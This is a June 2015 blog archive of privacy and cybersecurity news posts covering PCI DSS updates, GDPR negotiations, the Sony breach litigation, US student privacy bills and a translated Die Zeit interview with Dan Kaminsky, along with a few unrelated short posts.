Monthly Archives: June 2015

PCI Security Standards Council Releases Enhanced Validation Requirements for Designated Entities as PCI DSS Version 3.0 Set to Retire

Earlier this month, the Payment Card Industry Security Standards Council (“PCI SSC”) published a set of enhanced validation procedures designed to provide greater assurance that certain entities are maintaining compliance with the PCI Data Security Standard (“PCI DSS”) effectively and on a continuing basis. The payment card brands and acquirers will determine which organizations are required to undergo a compliance assessment with respect to these supplemental validation requirements, which are entitled the PCI DSS Designated Entities Supplemental Validation (“DESV”).

The DESV complements the PCI DSS and contains additional security control requirements that are organized into the following 5 control areas:

  1. Implement a PCI DSS compliance program;
  2. Document and validate PCI DSS scope;
  3. Validate that PCI DSS is incorporated into business-as-usual activities;
  4. Control and manage logical access to the cardholder data environment; and
  5. Identify and respond to suspicious events.

Those entities designated by the card brands for validation against the DESV must comply with the requirements set forth in the five control areas, which include, for example, increased administrative, validation and scoping controls. Entities that may be subject to the DESV include, for example, entities that (1) store, process or transmit large volumes of cardholder data; (2) provide aggregation points for cardholder data; or (3) have suffered significant or repeated breaches of cardholder data. According to the PCI SSC, the supplemental validation process typically will be performed in conjunction with the entity’s full PCI DSS assessment.

The release of the DESV coincides with the retirement of PCI DSS Version 3.0 on June 30, 2015. Although its replacement, Version 3.1, contains mostly minor updates and clarifications, the new version notably updates the standard’s encryption requirements to clarify that Secure Sockets Layer (“SSL”) and early Transport Layer Security (“TLS”) are not considered strong cryptography, and therefore will no longer be PCI DSS-compliant encryption protocols as of June 30, 2016. The migration from SSL to newer versions of TLS comes after several vulnerabilities were found to be associated with SSL, leading the National Institute of Standards and Technology to deem SSL as an unacceptable encryption protocol for the protection of data. In addition to the retirement of Version 3.0, the controls that Version 3.0 designated initially as best practices will now become PCI DSS requirements as of July 1, 2015.

SEC Cybersecurity Investigations: A How-to Guide

Hunton & Williams LLP partners Lisa J. Sotto, Scott H. Kimpel and Matthew P. Bosher recently published an article in Westlaw Journal’s Securities Litigation & Regulation entitled SEC Cybersecurity Investigations: A How-to Guide. The article details the U.S. Securities and Exchange Commission’s (“SEC’s”) role in cybersecurity regulation and enforcement, and offers best practice tips for navigating the investigative process. In the article, the authors note that the threat of an SEC enforcement investigation must be considered an integral part of cybersecurity planning and compliance efforts. “Being prepared to engage the SEC in a proactive manner is often the best approach.” Download a copy of the full article now.

Hunton Webinar on the Proposed EU General Data Protection Regulation on July 9

Hunton & Williams will host a live webinar covering the latest developments on the proposed EU General Data Protection Regulation on Thursday, July 9, at 12:00 p.m. EDT. The webinar will provide an overview of the current status of the EU General Data Protection Regulation, highlights from the ongoing trilogue discussions, and guidance on how to prepare for the upcoming changes.

This webinar is the first segment of a two-part series addressing updates on the proposed European legislative reform. We will hold Part II later this year as negotiations continue to develop.

Register for this program now.

StopBadware transferring operations to University of Tulsa

In 2006, Harvard’s Berkman Center introduced a new project: StopBadware.org, a collective effort to protect consumers from bad software and expose the people who profited from it. StopBadware was to be a collaboration between the academic community and leading technology companies, a force for transparency and openness in an increasingly siloed online environment, and a haven for users seeking information about bad software and malicious websites. The project was backed by Internet pioneers in both business and academia: founders Jonathan Zittrain and John Palfrey, advisers Vint Cerf and Esther Dyson, supporting companies including Google and Lenovo. From its first day, StopBadware was a collaboration intended to demonstrate the full promise of the Internet by protecting and expanding user choice.

After almost a decade of collaborative work and more than five years as a standalone nonprofit, StopBadware is shutting down operations as an independent organization and transferring core programs to the University of Tulsa, where they’ll be run by our longtime research adviser, Dr. Tyler Moore. This decision rested upon two pillars: the unpredictability of long-term funding prospects and the strength of our ties to the research community. Ultimately, StopBadware’s board and staff agreed that our mission is better served by re-establishing roots in academia under the capable guidance of Dr. Moore and his team.

The programs we expect to transfer to Tulsa include our independent review process, the StopBadware Data Sharing Program, and maintenance of informational resources and searchable Clearinghouse.

What does this mean in practical terms?

  • Users and webmasters will still be able to look up URLs, IPs, and ASNs in our Clearinghouse and report malicious URLs to our community feed.
  • Website owners whose resources are blacklisted by one or more of our data providers will still be able to request an independent review from StopBadware.
  • Technology companies, independent security researchers, and academic institutions will still be able to contribute malware data feeds to StopBadware’s data sharing program.
  • StopBadware’s shared and proprietary data will still be used to facilitate research on cybercrime and the security ecosystem.
  • Users who encounter browser or search warnings about malware websites will still be able to reach StopBadware information about badware and how to protect their computers.

StopBadware’s Boston-based office and staff will cease operation by September, as will our current board of directors. Over the next few months, we’ll also be shutting down the StopBadware Partner program and the We Stop Badware™ Web Host program in order to let the incoming team in Tulsa focus on the review process, data sharing program, and research projects. The StopBadware Board and outgoing staff have known Tyler Moore since our early days as a Berkman Center project; we have the utmost confidence in his vision and unflagging dedication to StopBadware’s mission.

Over the next two months, we’ll be painting a bigger picture for our community to illustrate StopBadware’s accomplishments, both as an independent nonprofit and as a decade-old project in collaborative security. We’ll also turn our blog over to Dr. Moore part-time so he can expound upon his plans for the new iteration of StopBadware. Like many other good Internet citizens, we welcome the future!

- The StopBadware team

Federal Court: Data Breach Class Action Against Sony Survives Motion to Dismiss

The U.S. District Court for the Central District of California recently granted, only in part, a motion to dismiss a data breach class action against Sony Pictures Entertainment, Inc. (“Sony”) in Corona v. Sony Pictures Entertainment, Inc., No. 14-CV-09600 (RGK) (C.D. Cal. June 15, 2015). The case therefore will proceed with some of the claims intact.

The litigation arose from a security breach at Sony where the sensitive and personal information of at least 15,000 former and current Sony employees was stolen. The putative class alleged:  (1) negligence; (2) breach of implied contract; (3) violation of the California Customer Records Act; (4) violation of the California Confidentiality of Medical Information Act; (5) violation of the Unfair Competition Law; (6) declaratory judgment; (7) violation of Virginia Code §18.2‑186.6; and (8) violation of Colorado Revised Statutes § 6-1-716. Sony moved to dismiss for lack of Article III standing under Rule 12(b)(1) and failure to state a claim under Rule 12(b)(6).

Rule 12(b)(1) standing challenge rejected. Of all the federal circuits, data breach litigants currently are more likely to weather a standing attack in the Ninth Circuit. The Sony case was no exception. It cited to Krottner v. Starbucks Corp., 628 F.3d 1139 (9th Cir. 2010), to support its standing analysis. This is notable because district courts in the Ninth Circuit often do not treat Krottner as being overruled by the later-decided standing opinion of the Supreme Court of the United States in Clapper v. Amnesty Int’l USA, 133 S. Ct. 1138 (2013). E.g., In re Adobe Sys., Inc. Privacy Litig., No. 13-CV-05226-LHK, 2014 WL 4379916 (N.D. Cal. Sept. 4, 2014) (finding sufficient standing allegations even when plaintiffs did not establish that hackers used their information).

Under Krottner, the Sony court quickly found that the plaintiffs had properly alleged sufficient facts to establish Article III standing and disagreed with Sony that allegations of either “a current injury or a threatened injury that is certainly impending” were lacking. The court held that the personally identifiable information (“PII”) was stolen and posted on file-sharing websites for identity thieves to download, and that the PII was used to send threatening e-mails to employees and their families. The court stated, “These allegations alone are sufficient to establish a credible threat of real and immediate harm, or certainly impending injury.”

Rule 12(b)(6) challenges were both granted and denied.

  • Claims that survived  The court found that allegations of “future harm or an increased risk in harm that has not yet occurred” do not demonstrate a cognizable injury to support a negligence claim arising from an alleged duty to implement and maintain adequate security measures to safeguard employees’ PII. The court also rejected the theory that the plaintiffs’ PII constitutes property for lack of authority that the PII has any compensable value in the economy at large.Nevertheless, the court recognized that California courts have not considered, in data breach cases, whether the costs of prophylactic measures (credit monitoring, obtaining credit reports. identity-theft protection, etc.) are sufficient to support a negligence claim. Adapting case law on toxic exposure, the court identified several allegations that showed both “reasonableness and necessity,” including the sensitive nature of the PII, the posting of the PII to the Internet, the actual access of information from file-sharing sites, threats made to employees, the explicit threat of future data exposure by hackers, and notification to some plaintiffs of attempted identity theft. The court also held that a “special relationship” between Sony and its employees existed, which invalidated Sony’s economic-loss doctrine defense.However, the Court found “implausible any argument that Sony’s alleged delay [of approximately 3 weeks] in notification proximately caused any of the economic injury” alleged. The portion of the negligence claim, which was based on the alleged duty to timely notify, was dismissed.

    The California Confidentiality of Medical Information Act (“CIMA”) claim survived. CIMA directs employers who receive medical information to establish procedures to safeguard the confidentiality and protection of that information from unauthorized use and disclosure. Noting that CIMA authorizes a private right of action for covered medical information that is “negligently released,” the court also recognized that California law does not require affirmative action to constitute a negligent release, and allowed the claim to proceed.

    The Unfair Competition Law (“UCL”) claim also advanced. The court noted that predicate acts for the UCL claim remained because the plaintiffs’ allegations sufficiently alleged injury-in-fact, economic loss, and because portions of the plaintiffs’ negligence and CIMA claims survived dismissal. In light of the ruling on the UCL claim, the court derivatively refused to dismiss the claims for declaratory and injunction relief.

  • Claims that were dismissed  But, the plaintiffs did not have a complete victory. Their implied contract claim was dismissed (with leave to amend) because there were “no facts indicating that Sony’s acts were intended to frustrate the agreed common purpose of the [employment] agreement.” The court also found significant that the putative class included members who “were no longer employed by Sony at the time the data breach occurred.”The court likewise dismissed the California Customer Records Act (“CRA”) claim, but without leave to amend. This California statute regulates businesses’ “treatment and notification procedures relating to their customers’ personal information.” (emphasis added) Because the complaint’s allegations made “clear that Plaintiffs are not customers within the meaning of the statute,” the CRA allegations failed to state a claim. Additionally, the court dismissed the Virginia and Colorado breach notification claims without leave to amend, primarily for lack of allegations of direct economic damages resulting from Sony’s purported failure to notify in a timely manner.

The Sony case and others make clear that data breach litigation is on the rise and surviving many of the traditional Rule 12 arguments with increasing consistency.

Waterloo

Captain Clement Swetenham, 16th Light Dragoons, fought at Waterloo. His great-great-great grandson Foster Swetenham has posted more information and photos of his portrait, his Waterloo and Peninsula medals and his charger Mask.

 

Safe Computing In An Unsafe World: Die Zeit Interview

So some of the more fun bugs involve one team saying, “Heh, we don’t need to validate input, we just pass data through to the next layer.”  And the the next team is like, “Heh, we don’t need to validate input, it’s already clean by the time it reaches us.”  The fun comes when you put these teams in the same room.  (Bring the popcorn, but be discreet!)

Policy and Technology have some shared issues, that sometimes they want each other to solve.  Meanwhile, things stay on fire.

I talked about some of our challenges in Infosec with Die Zeit recently.  Germany got hit pretty bad recently and there’s some soul searching.  I’ll let the interview mostly speak for itself, but I would like to clarify two things:

1) Microsoft’s SDL (Security Development Lifecycle) deserves more credit.  It clearly yields more secure code.  But getting past code, into systems, networks, relationships, environments — there’s a scale of security that society needs, which technology hasn’t achieved yet.

2) I’m not at all advocating military response to cyber attacks.  That would be awful.  But there’s not some magic Get Out Of War free card just because something came over the Internet.  For all the talk of regulating non-state actors, it’s actually the states that can potentially completely overwhelm any potential technological defense.   Their only constraints are a) fear of getting caught, b) fear of damaging economic interests, and c) fear of causing a war.  I have doubts as to how strong those fears are, or remain.  See, they’re called externalities for a reason…

(Note:  This interview was translated into German, and then back into English.  So, if I sound a little weird, that’s why.)


Der IT-Sicherheitsforscher und Hacker Dan Kaminsky

(Headline) „No one knows how to make a computer safe.”

(Subheading) The American computer security specialist Dan Kaminsky talks about the cyber-attack on the German Bundestag: In an age of hacker wars, diplomacy is a stronger weapon than technology.

AMENDED VERSION

Dan Kaminsky (https://dankaminsky.com/bio/) is one of the most well-known hacker- and IT security specialists in the United States. He made a name for himself with the discovery of severe security holes on the Internet and in computer systems of large corporations. In 2008, he located a basic error in the DNS, (http://www.wired.com/2008/07/kaminsky-on-how/), the telephone book of the Internet, and coordinated a worldwide repair. Nowadays, he works as a “chief scientist” at the New York computer security firm White Ops. (http://www.whiteops.com).

Questions asked by Thomas Fischermann

ZEIT Online: After the cyber attack on the German Bundestag, there has been a lot of criticism against the IT manager. (http://www.zeit.de/digital/datenschutz/2015-06/hackerangriff-bundestag-kritik).
Are the Germans sloppy when it comes to computer security?

Dan Kaminsky: No one should be surprised if a cyber attack succeeds somewhere. Everything can be hacked. I assume that all large companies are confronted somehow with hackers in their systems, and in national systems, successful intrusions have increased. The United States, e.g., have recently lost sensitive data of people with “top security” access to state secrets to Chinese hackers. (http://www.reuters.com/article/2015/06/15/us-cybersecurity-usa-exposure-idUSKBN0OV0CC20150615)

ZEIT Online: Due to secret services and super hackers employed by the government who are using the Internet recently?

Kaminsky: I’ll share a business secret with you: Hacking is very simple. Even teenagers can do that. And some of the most sensational computer break-ins in history are standard in technical terms – e.g., the attack on the Universal Sony Pictures in the last year where Barack Obama publically blamed North Korea for. (http://www.zeit.de/2014/53/hackerangriff-sony-nordkorea-obama). Three or four engineers manage that in three to four months.

ZEIT Online: It has been stated over and over again that some hacker attacks carry the “signature” of large competent state institutions.

Kaminsky: Sometimes it is true, sometimes it is not. Of course, state institutions can work better, with less error rates, permanently and more unnoticed. And they can attack very difficult destinations: e.g., nuclear power plants, technical infrastructures. They can prepare future cyber-attacks and could turn off the power of an entire city in case of an event of war.

ZEIT Online: But once more: Could we not have protected the computer of the German Bundestag better?

Kaminsky: There is a very old race among hackers between attackers and defenders. Nowadays, attackers have a lot of possibilities while defenders only have a few. At the moment, no one knows how to make a computer really safe.

ZEIT Online: That does not sound optimistic.

Kaminsky: The situation can change. All great technological developments have been unsafe in the beginning, just think of the rail, automobiles and aircrafts. The most important thing in the beginning is that they work, after that they get safer. We have been working on the security of the Internet and the computer systems for the last 15 years…

ZEIT Online: How is it going?

Kaminsky: There is a whole movement for example that is looking for new programming methods in order to eliminate the gateways for hackers. In my opinion, the “Langsec” approach is very interesting (http://www.upstandinghackers.com/langsec), with which you are looking for a kind of a binding grammar for computer programs and data formats that make everything safe. If you follow the rules, it should be hard for a programmer to produce that kind of errors that would be used by hostile hackers later on. When a system executes a program in the future or when a software needs to process a data record, it will be checked precisely to see if all rules where followed – as if a grammar teacher would check them.

ZEIT Online: That still sounds very theoretical…

Kaminsky: It is a new technology, it is still under development. In the end it will not only be possible to write a secure software, but also to have it happen in a natural way without any special effort, and it shall be cheap.

ZEIT Online: Which other approaches do you consider promising?

Kaminsky: Ongoing safety tests for computer networks are becoming more widespread: Firms and institutions pay hackers to permanently break-in in order to find holes and close them. Nowadays, this happens sporadically or in large intervals, but in the future we will need more of those “friendly” hackers.  Third, there is a totally new generation of anti-hacker software in progress. Their task is not to prevent break-ins – because they will happen anyway – but to observe the intruders very well. This way we can assess better who the hackers are and we can prevent them from gaining access over days or weeks.

ZEIT Online: Nevertheless, those are still future scenarios. What can we do today if we are already in possession of important data? Go offline?

Kaminsky: No one will go offline. That is simply too inefficient. Even today you can already store data in a way that they are not completely gone after a successful hacker attack. You split them. Does a computer user really ever need to have access to all the documents in the whole system? Does the user need so much system band width that he can download masses of documents?

ZEIT Online: A famous case for this is the US Secret Service that lost thousands of documents to Edward Snowden. There are also a lot of hackers though who work for the NSA in order to break in other computer systems …

Kaminsky: … yeah, and that is poison for the security of the net. The NSA and a lot of other secret services say nowadays: We want to defend our computers – and attack the others. Most of the time, they decide to attack and make the Internet even more unsafe for everyone.

ZEIT Online: DO you have an example for this?

Kaminsky: American secret services have known for more than a decade that a spy software can be saved on the operating system of computer hard disks.
(http://www.geek.com/apps/nsa-malware-found-hiding-in-hard-drives-for-almost-20-years-1615949/, http://www.kaspersky.com/about/news/virus/2015/Equation-Group-The-Crown-Creator-of-Cyber-Espionage). Instead of getting rid of those security holes, they have been actively using it for themselves over the years… The spyware was open for the secret services – who have been using it for a number of malwares that have been discovered recently– and for everyone who has discovered those holes as well.

ZEIT Online: Can you change such a behavior?

Kaminsky: Yes, economically. Nowadays, spying authorities draw their right to exist from being able to get information from other people’s computer. If they made the Internet safer, they would hardly be rewarded for that…

ZEIT Online: A whole industry is taking care of the security of the net as well: Sellers of anti-virus and other protection programs.

Kaminsky: Nowadays, we spend a lot of money on security programs. But we do not even know if the computers that are protected in that way are really the ones who get hacked less often. We do not have any good empirical data and no controlled study about that.

ZEIT Online: Why does no one take such studies?

Kaminsky: This is obviously a market failure. The market does not offer services that would be urgently needed for increased safety in computer networks. A classical case in which governments could make themselves useful – the state. By the way, the state could contribute something else: deterrence

ZEIT Online: Pardon?

Kaminsky: In terms of computer security, we still blame the victims themselves most of the time: You have been hacked, how dumb! But when it comes to national hacker attacks that could lead to cyber wars this way of thinking is not appropriate. If someone dropped bombs over a city, no one’s first reaction would be: How dumb of you to not having thought about defensive missiles!

ZEIT Online: How should the answer look like then?

Kaminsky: Usually nation states are good in coming up with collective punishments: diplomatic reactions, economic sanctions or even acts of war. It is important that the nation states discuss with each other about what would be an adequate level of national hacker attacks and what would be too much. We have established that kind of rules for conventional wars but not for hacker attacks and cyber war. For a long time they had been considered as dangerous, but that has changed. You want to live in a cyber war zone as little as you want to live in a conventional war zone!

ZEIT Online: To be prepared for counterstrikes you first of all have to know the attacker. We still do not know the ones who were responsible for the German Bundestag hack…

Kaminsky: Yeah, sometimes you do not know who is attacking you. In the Internet there are not that many borders or geographical entities, and attackers can even veil their background. In order to really solve this problem, you would have to change the architecture of the Internet.

ZEIT Online: You had to?

Kaminsky: … and then there is still the question: Would it be really better for us, economically wise, than the leading communication technologies Minitel from France or America Online? Were our lives better when network connections were still horrible expensive? And is a new kind of net even possible when well appointed criminals or nation states could find new ways for manipulation anyway? The „attribution problem“ with cyber attacks stays serious and there are no obvious solutions. There are a lot of solutions though that are even worse than the problem itself.

Questions were asked by Thomas Fischermann (@strandreporter, @zeitbomber)

New Hampshire and Oregon Student Privacy Legislation

Legislators in New Hampshire and Oregon recently passed bills designed to protect the online privacy of students in kindergarten through 12th grade.

On June 11, 2015, New Hampshire Governor Maggie Hassan (D-NH) signed H.B. 520, a bipartisan bill that requires operators of websites, online platforms and applications targeting students and their families (“Operators”) to create and maintain “reasonable” security procedures to protect certain covered information about students. H.B. 520 also prohibits Operators from using covered information for targeted advertising. H.B. 520 defines covered information broadly as “personally identifiable information or materials,” including name, address, date of birth, telephone number and educational records, provided to Operators by students, their schools, their parents or legal guardians, or otherwise gathered by the Operators.

Governor Hassan said that technology “is an essential component of the 21st century innovation economy” and plays an important and growing role in the classroom. She added that H.B. 520 protects New Hampshire students against threats to their privacy while enabling them to participate in that economy. H.B. 520 takes effect on January 1, 2016.

On June 10, 2015, the Oregon legislature passed S.B. 187, providing similar protections to K-12 students’ personal information and restricting the use of that information by Operators. The bill defines “covered information” in the same way as the New Hampshire student privacy bill and applies to the same types of Operators. S.B. 187 prohibits selling student information and presenting students with targeted advertisements. Operators also may not disclose student information to third parties, except in limited circumstances, but may use “de-identified student information” to improve or market the effectiveness of their products. Legislators rejected proposals backed by the technology industry that would have allowed students ages 12 and older to consent to the use and disclosure of covered information.

S.B. 187 grants the Oregon Attorney General enforcement power under the state’s consumer protection statute. Governor Kate Brown (D-OR) is expected to sign the bill, which would take effect on July 1, 2016.

Both New Hampshire and Oregon modeled their student privacy legislation on California’s Student Online Personal Information Protection Act, which was enacted in 2014.

Consumer Groups Drop Out of NTIA Multistakeholder Process Regarding the Commercial Use of Facial Recognition Technology

On June 16, 2015, the Consumer Federation of America announced in a joint statement with other privacy advocacy groups that they would no longer participate in the U.S. Department of Commerce’s National Telecommunications and Information Administration (“NTIA”) multistakeholder process to develop a code of conduct regarding the commercial use of facial recognition technology. The letter was signed by the Center for Democracy & Technology, the Center for Digital Democracy, the Consumer Federation of America, Common Sense Media, the Electronic Frontier Foundation, the American Civil Liberties Union, Consumer Action, Consumer Watchdog and the Center on Privacy & Technology at Georgetown University Law Center. This decision comes after 16 months of meetings and negotiations. In its announcement, the group highlighted its inability to come to an agreement with industry groups on how the issue of consumer consent would be addressed in a code of conduct regarding the use of facial recognition technology. Specifically, the disagreement between consumer and industry groups revolved around the default rule for consumer consent (i.e., whether the default should be opt-in or opt-out consent).

On June 15, the NTIA said it will continue the work on facial recognition rules. By way of a next step, a working group will continue discussions on consumer consent, anti-fraud uses of facial recognition technology and other related topics. After the discussions, the working group will draft a proposal for review by the NTIA prior to its next public meeting in July.

Read more information about the process.

Article 29 Working Party Publishes Its Position on the Proposed EU General Data Protection Regulation

On June 18, 2015, the Article 29 Working Party (the “Working Party”) published letters regarding the proposed EU General Data Protection Regulation (the “Regulation”) addressed to representatives of the Council of the European Union, the European Parliament and the European Commission. Attached to each of the letters is an Appendix detailing the Working Party’s opinion on the core themes of the Regulation.

The Parliament, the Commission and the Council will now come together in a “trilogue” to negotiate and agree on a final text of the Regulation. The first trilogue meeting is expected to take place on June 24, 2015. The purpose of the Working Party’s letters and attached Appendix appears to be to set out the Working Party’s position on a range of core issues in the Regulation, and to ensure the Working Party’s views are taken into account as the trilogue proceeds.

The Working Party’s key points include:

  • Territorial Scope – In addition to the already broad territorial scope of the Regulation, the Working Party is of the view that the Regulation should apply to non-EU processors, where they act on behalf of controllers that are subject to the Regulation (in line with the Parliament’s views on this issue).
  • Definition of Personal Data – The Working Party reiterates its view that IP addresses, online identifiers and other similar factors that enable an individual to be “singled out” (even if that individual’s real-world identity remains unknown) should, as a general rule, constitute personal data and therefore be subject to the Regulation. This proposal has significant implications for the online advertising sector, as it would potentially make many advertising cookies and tracking technologies subject to the Regulation.
  • Pseudonymous Data – The Working Party is opposed to the classification of “pseudonymous data” as a separate category of personal data, subject to a lighter legal regime, the processing of which is not subject to the “balance of interests” test (effectively opposing the Parliament’s position on this issue). The Working Party does, however, support the use of pseudonymisation techniques as a security and risk mitigation measure.
  • Purpose Limitation – The Working Party recommends that personal data should never be processed for purposes incompatible with those for which they were collected. Instead, it takes the view that an additional legal basis should be required, even for processing for new purposes that are not incompatible with the original purpose. This proposal may have material consequences for “big data” companies and others for whom the reuse of existing data is a key part of doing business.
  • The “household purposes” exemption – In line with the Court of Justice of the European Union’s decision in Ryneš, the Working Party considers that the “household purposes” exemption should be limited to “purely” household activities.
  • Mandatory DPOs – The Working Party is in favor of imposing a mandatory obligation to appoint a Data Protection Officer upon data controllers, if they meet certain thresholds in terms of the type, volume or nature of the data being processed (although the Working Party does not specify what those thresholds should be).
  • Information Notices – The Working Party supports the use of layered privacy notices, and the proposal that data subjects should also be provided with information relating to further processing, data retention periods, international transfers and security measures.
  • Data Portability – The Working Party supports the proposed broad scope of the right to data portability, and suggests that this right should be separate to the right of access.
  • Right to Object – The Working Party is of the view that the right of data subjects to object to processing should apply widely, and should not be limited to processing performed on the basis of: (1) the legitimate interests of the data controller; (2) the public interest; or (3) the exercise of official authority.
  • Profiling – The Working Party highlights that the proposals in the Regulation relating to data subject profiling are unclear and do not ensure sufficient safeguards to protect data subjects. The Working Party recommends that the creation of profiles should be limited to particular purposes (although the Working Party does not specify those purposes), and that specific obligations should be imposed on data controllers to inform data subjects of: (1) the relevant profiling measures that will apply to their data; and (2) the right to object.
  • Risk-Based Approach – While the Working Party does not directly oppose the risk-based approach in general, it considers that risk should not be a determining factor in relation to a controller’s accountability obligations.
  • Data Breach Notification – The Working Party supports different de minimis thresholds for notification to data subjects and to Supervisory Authorities. The Working Party further proposes that the notification obligations in the Regulation should be aligned with the equivalent obligations in the e-Privacy Directive (under which notification is required only where the breach is likely to “adversely affect” the personal data or privacy of a data subject).
  • Data Transfers – The Working Party supports the inclusion of legitimate interests as a ground for the transfer of personal data outside the EEA, but is of the view that its use should be limited to exceptional circumstances, and not for large-scale, regular transfers of personal data.
  • Access by Public Authorities – In the event that a court, tribunal or public authority in a non-EU jurisdiction demands access to personal data that are subject to the Regulation, the Working Party recommends that such matters be dealt with under a Mutual Legal Assistance Treaty, where one exists. Where no such treaty is in place, the relevant controller should report the matter to the competent Supervisory Authority. The Working Party’s previous guidance on this point in the context of Binding Corporate Rules (“BCRs”) for processors provides some helpful context.
  • Binding Corporate Rules – The Working Party considers it essential that BCRs for processors continue to be recognized as a valid mechanism for cross-border data transfers.
  • One-Stop Shop – The Working Party expresses its support for the “one-stop shop” in principle, but recommends that the details of its implementation are left to the European Data Protection Board, rather than being prescribed in the Regulation.
  • Fines – The Working Party welcomes the introduction of significant fines for breaches of the Regulation, and also considers that the imposition of fines where a data controller or processor fails to cooperate with its Supervisory Authority should be reinstated.

Hunton & Williams has released a Guide to the Regulation, which is available by soft copy. An updated copy of this Guide will be released following the conclusion of the trilogue process and the release of the final text of the Regulation.

Council of the European Union Agrees on General Approach to the Proposed General Data Protection Regulation

The Council of the European Union has agreed on a general approach to the proposed EU General Data Protection Regulation (the “Regulation”). This marks a significant step forward in the legislative process, and the Council’s text will form the basis of its “trilogue” negotiations with the European Parliament and the European Commission. The aim of the trilogue process is to achieve agreement on a final text of the Regulation by the end of 2015. The first trilogue meeting is expected to take place on June 24, 2015.

Among the most significant features of the Council’s draft text are the revisions to the “establishment” and the “one-stop shop” concepts. These concepts will govern the application of the Regulation to data controllers that operate in more than one EU Member State. In particular, they will determine which data protection authority will regulate each controller’s data processing activities. They are, therefore, of critical importance to many international businesses.

Other key proposals in the Council’s text include: increased rights for data subjects; maximum penalties for non-compliance of €1 million or 2% of global annual turnover (a significant reduction from the €100 million / 5% figures proposed by the Parliament); and clarifications on the rules relating to cross-border data transfers.

Hunton & Williams has released a Guide to the Regulation, which is available by soft copy. An updated copy of this Guide will be released following the conclusion of the trilogue process and the release of the final text of the Regulation.

Hong Kong Privacy Commissioner Hosts 43rd APPA Forum and Big Data Conference

On June 11 and 12, 2015, Asia Pacific Privacy Authority (“APPA”) members, invited observers and guest speakers from the government, private sector, academia and civil society, met in Hong Kong to discuss privacy law and policy issues at the 43rd APPA Forum. At the end of the open session on day two, APPA issued its customary communiqué, setting forth the highlights of the discussions of the open and closed sessions. The Hong Kong Privacy Commissioner, who hosted the APPA meeting, also hosted a conference on big data and privacy on June 10.

According to the Communiqué, during the closed session, APPA members and invited observers discussed numerous issues of common interest, including legal reforms across the region, law enforcement and investigation matters, breach notification and transparency in reporting requests from law enforcement and national security authorities to companies for personal information. During the closed session, privacy developments in other international fora and groups, such as APEC, the International Conference of Data Protection and Privacy Commissioners, GPEN and the Ibero-American Network of Data Protection were also discussed. Finally, attendees of the closed session discussed privacy issues associated with big data and behavioral advertising, the regulation of public domain data and organizational accountability.

During the open session, APPA members and observers were joined by local and international privacy experts, including representatives from the Centre for Information Policy Leadership at Hunton & Williams LLP (“CIPL”), to discuss issues relating to data management and use in the modern information age. Other topics of discussion included updates on privacy laws in China and Taiwan, managing research data, open data and access to open data, health data and privacy, and smart cities and IT.

The previous day, the Hong Kong Privacy Commissioner hosted the International Conference on Big Data from a Privacy Perspective. The public event was attended by many privacy commissioners, as well as privacy professionals and industry representatives from across the Asia-Pacific region. The conference considered the benefits and risks of Big Data in a data driven world and how the industry should innovate and find new ways to provide transparency to individuals. The CIPL delegation participated in a panel discussion entitled Big Data and Emerging Best Practices for a Win-Win Situation: Protecting Privacy and Enabling Benefits in a Data Driven Economy, and offered solutions and best practices.

APPA is the principal forum for privacy authorities in the Asia-Pacific Region. APPA members meet twice a year to discuss recent developments, issues of common interest and cooperation.

DataGuidance Hosts Webinar on Brazil’s Draft Privacy Law

On June 24, 2015, DataGuidance will host a complimentary webinar on Brazil: Towards Privacy Compliance. The panel of speakers includes Bojana Bellamy, President of the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams; Esther Nunes, Partner of Pinheiro Neto Advogados; and Renato Leite Monteiro of Opice Blum, Bruno, Abrusio & Vainzof Advogados Associados. The speakers will discuss the Draft Bill for the Protection of Personal Data (Anteprojeto de Lei para a Proteção de Dados Pessoais) that was issued in January 2015. Concepts and provisions in the draft bill such as the role of Data Protection Officers and Binding Corporate Rules will be discussed. The webinar will be from 10:00 a.m. to 11:00 a.m. EDT.

On May 5, 2015, CIPL filed comments on Brazil’s draft bill as part of its ongoing Brazil outreach initiative.

 

Time For a Digital Detox or Better Filtering?



Being easily distracted has been a thorn in my side since Oldbury Park Primary School. I remember the day when mum and dad sat me down and read out my year 6 school report. Things were going so well, and then - boom - a comment from Mrs Horn that rained on my previously unsullied education record. ‘’Sarah can organize herself and her work quite competently if she wishes, but of late has been too easily distracted by those around her.” She had a point, but try telling that to a distraught eleven year who valued the opinion of her teachers. I made a vow after that. I would never let my report card be sullied again. Working on my concentration in secondary school and college helped me to pass my GCSEs and A-levels.


Then, when I entered the world of work I found an environment not too dissimilar to school. There were managers to impress, friends to win, and office politics instead of playground politics. Comme ci comm. But I was more informed this time, and found ways to stay focused: wearing headphones (a great way to show your otherwise engaged), meditation (limited to the park, never in the office), and writing to-do lists. But these are workplace tactics, if I were a student now, my report would probably be worse. I'd be lost with access to so many devices and so much time-wasting material.
So there, I’ve laid bare more than I should have, but I think my personal character assassination has been worth it, because it’s proved a point. Kids have always been distracted; tech has just made the problem worse. In addition to the usual classroom distractions, teachers now have to manage digital distractions, and it’s all affecting students’ progress.


For the head of the Old Hall School in Telford, Martin Stott, observing this trend was worrying. He said, “It seems to me that children’s ability to take on board the instructions for multi-step tasks has deteriorated. For a lot of children, all their conversation revolves around these games. It upsets me to see families in restaurants and as soon as they sit down the children get out their iPads.” Stott isn’t the first to raise the issue of digital dependency, (there are digital detox centers for adults who want to have a break from tech). He might, however, be the first to bring the issue to the education arena and get significant media coverage, by introducing a week’s digital embargo at his school. Students have to put away the Xboxes, iPads, and turn off the TV in an attempt to discover other activities like reading, board games and cards.

I’m split on the whole digital detox idea. The cynic asks how can a one week break to make any real change to the amount of time kids spend on devices. And restricting them completely is a sure fire way to spark rebellion. But my optimistic side says it’s a step in the right direction. It raises awareness by asking kids to realize that there’s life outside Minecraft and social media. Now that’s not so bad.

Nonetheless I do think that the problems with device dependency at Old Hall School could be solved with better filtering instead of a digital detox. As existing users will tell you, there’s a trusty little tool in our web filter known as ‘limit to quota’. Admins can configure the amount of time users can spend on different types of material, including material classified as time-wasting. According to predefined rules, users can use their allocation in bite-sized chunks, and be prompted every five or ten minutes, with an alert stating how much they’ve used. That way they’ll be no nasty shocks; when the timer eventually runs out after 60 minutes, they’ll be able to continue using the safe parts of the web that support their educational needs, without the distractions. Now that’s got to be more appealing than dropping the devices cold turkey, isn’t it?


Talking with Stewart Baker

